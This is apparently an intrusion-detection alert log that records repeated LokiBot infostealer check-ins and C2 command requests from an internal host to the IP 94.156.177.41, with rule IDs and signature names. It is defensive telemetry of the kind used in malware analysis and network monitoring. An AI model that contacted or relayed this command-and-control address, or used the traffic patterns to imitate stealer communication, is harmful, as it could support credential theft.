2025-01-11T01:43:14.611221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.317903+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.317903+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.169920+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.169920+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.034256+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.034256+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.008658+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.008658+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:18.899257+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:18.899257+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.776146+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.776146+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.675015+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.675015+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.529416+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.529416+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.419117+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.419117+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.300654+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.300654+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.173563+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.173563+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.031983+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.031983+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:25.949805+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:25.949805+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.814642+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.814642+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.681023+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.681023+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.609487+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.609487+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.581279+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.581279+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.500137+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.500137+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.580940+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.580940+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.450949+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.450949+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.314839+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.314839+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.659023+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.659023+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.532934+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.532934+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.403855+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.403855+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.315630+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.315630+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.226839+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.226839+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.084674+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.084674+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:39.967691+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:39.967691+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:40.906466+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:40.906466+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:41.803250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:41.803250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.794250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.794250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.674930+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.674930+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.614068+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.614068+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.582363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.582363+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.438299+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.438299+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.295907+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.295907+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.196551+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.196551+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.076139+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.076139+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:49.953109+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:49.953109+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.836273+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.836273+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:51.718554+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51374	94.156.177.41	80	TCP
